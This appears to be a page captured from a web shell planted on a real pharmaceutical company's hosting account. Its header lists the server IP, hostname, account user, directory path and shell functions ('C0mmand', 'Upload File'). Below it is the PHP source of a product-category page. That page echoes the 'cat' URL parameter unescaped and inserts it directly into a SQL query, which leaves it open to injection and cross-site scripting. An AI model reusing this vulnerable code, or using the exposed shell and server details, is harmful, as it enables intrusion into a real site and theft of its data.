Server IP : 2a02:4780:11:1361:0:bf7:7935:10 / Your IP : 18.218.237.3 Web Server : LiteSpeed System : Linux in-mum-web1261.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u200767797 ( 200767797) PHP Version : 8.1.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : ON Directory (0755) : /home/u200767797/domains/drusonpharma.com/public_html/test/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="keywords" content="bootstrap 5, premium, multipurpose, sass, scss, saas, rtl, Laboratory, medical" /> <meta name="description" content="Laboratory & Science Research HTML5 Template" /> <meta name="author" content="www.themeht.com" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>ASCENSOR</title> <link rel="shortcut icon" href="images/favicon.png"/> <link href="css/owl.carousel.css" rel="stylesheet" type="text/css" /> <link href="css/bootstrap.min.css" rel="stylesheet" type="text/css" /> <link href="https://fonts.googleapis.com/css2?family=Livvic:ital,wght@0,300;0,400;0,500;0,600;0,700;0,900;1,300;1,400;1,500;1,600;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet"> <link href="css/animate.css" rel="stylesheet" type="text/css" /> <link href="css/line-awesome.min.css" rel="stylesheet" type="text/css" /> <link href="css/owl.carousel.css" rel="stylesheet" type="text/css" /> <link href="css/lightslider.min.css" rel="stylesheet" type="text/css" /> <link href="css/base.css" rel="stylesheet" type="text/css" /> <link href="css/shortcodes.css" rel="stylesheet" type="text/css" /> <link href="css/style.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="page-wrapper"> <div id="ht-preloader"> <div class="clear-loader d-flex align-items-center justify-content-center"> <div class="loader"> <img src="images/logo2.png"> </div> </div> </div> <?php include 'header.php';?> <section class="w3l-about-breadcrum"> <div class="breadcrum-bg"> <div class="container py-5"> <p style="color:#1C2431; font-size:21px; font-weight:700;"><a href="index.php"style="color:#D73D3D">Home</a> / <?php echo $_GET['cat'] ?></p> <h2 class="breadcrumb_text"> <?php echo $_GET['cat'] ?></h2> </div> </div> </section> <section id="aboutt_us"> <div class="container"> <div class="row"> <?php include('connection.php'); $cat = $_GET['cat']; $cate=mysqli_query($con,"SELECT * FROM `sub_categories` where `category` = '$cat' order by id desc"); $a=0; while($row=mysqli_fetch_array($cate)){ $a++; $id=$row['id']; $ques=$row['category']; $sb=$row['sub_category']; $image=$row['image']; $path = $base.'admin/dist/include/subcategory/'.$image; ?> <div class="col-md-4"> <div class="product_detailss"> <img src="<?php echo $path ?>"> <h3><?php echo $sb ?></h3> <!--<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. </p>--> <a href="product.php?sub=<?php echo $sb ?>">Read More</a> </div> </div> <?php } ?> </div> </div> </section> <?php include 'footer.php';?> </div> <div class="modal fade cart-modal" id="cartModal" tabindex="-1" role="dialog" aria-labelledby="ModalLabel" aria-hidden="true"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="ModalLabel">Your Cart (2)</h5> <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button> </div> <div class="modal-body"> <div> <div class="row align-items-center"> <div class="col-5 d-flex align-items-center"> <div class="me-4"> <button type="submit" class="btn btn-theme btn-sm"><i class="las la-times"></i> </button> </div> <a href="product-left-image.html"> <img class="img-fluid" src="images/product/01.jpg" alt="..."> </a> </div> <div class="col-7"> <h6><a class="link-title" href="product-single.html">Dealistic Microscope</a></h6> <div class="product-meta"><span class="me-2 text-theme">$120.00</span><span class="text-muted">x 1</span> </div> </div> </div> </div> <hr class="my-5"> <div> <div class="row align-items-center"> <div class="col-5 d-flex align-items-center"> <div class="me-4"> <button type="submit" class="btn btn-theme btn-sm"><i class="las la-times"></i> </button> </div> <a href="product-single.html"> <img class="img-fluid" src="images/product/02.jpg" alt="..."> </a> </div> <div class="col-7"> <h6><a class="link-title" href="product-left-image.html">Biotechnology Microscope</a></h6> <div class="product-meta"><span class="me-2 text-theme">$160.00</span><span class="text-muted">x 1</span> </div> </div> </div> </div> <hr class="my-5"> <div class="d-flex justify-content-between align-items-center mb-8"> <span class="text-muted">Subtotal:</span> <span class="text-dark">$280.00</span> </div> <a href="product-cart.html" class="btn btn-theme me-2">View Cart</a> <a href="product-checkout.html" class="btn btn-dark">Continue To Checkout</a> </div> </div> </div> </div> <div class="scroll-top"><a class="smoothscroll" href="#top"><i class="las la-location-arrow"></i></a></div> <script src="js/theme.js"></script> <script src="js/theme-plugin.js"></script> <script src="js/theme-script.js"></script> </body> </html>